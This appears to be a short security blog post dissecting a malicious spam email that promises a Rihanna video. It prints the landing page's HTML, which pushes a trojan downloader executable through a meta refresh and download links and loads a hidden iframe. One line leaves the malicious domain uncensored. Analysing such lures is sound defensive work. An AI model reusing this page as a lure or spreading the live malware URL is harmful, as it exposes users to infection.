Malicious Spam in Action

Hi,

Usually Spam is targeted to Marketing Massive Action, that does not contains any form of Malicious Code, but in the last period there is a second collateral and heavly emerging trend (especially into Web Applications that allows comments, as Blogs) is the Malicious Spam, an apparent mail of Spam that redirects you to malicious code..

Here the latest Malicious Spam Mail that I’ve received on my gmail account:

Subject: mp3 Shocking for evilcry

Content: Rihanna New video!!!
Look It now

The malicious link points to http://ro{CENSORED}eel.com/index1.php

By dissecting the malicious link we can see that a redirection is done

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<html>
<head>
<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=http://robbiereel.com/video3425gdf3.exe”>
<title></title>
</head>

<body style=”background:#ffffff;”>
<iframe src=”http://ro{CENSORED}l.com/pindex.php” style=”width:1px; height:1px;”></iframe><br>

<div style=”text-align:center; padding-top:50px;”>
<a href=”http://ro{CENSORED}l.com/video3425gdf3.exe” style=”font-weight:bold;”><img src=”wait.gif” style=”border:0px;”></a><br>
<br>
<a href=”http://r{CENSORED}l.com/video3425gdf3.exe” style=”font-weight:bold; color:#364980; font-size:17px;”>Download Video</a>

</div>
</body>
</html>

The technique is always the same, a fake Video.exe that the Victim download and executes, in this case the malware is named video3425gdf3.exe

Let’s analyse¬†video3425gdf3.exe

File: video3425gdf3.exe

MD5: acd73c4930e8191fa7a35dac448d7f4b

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aacg

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: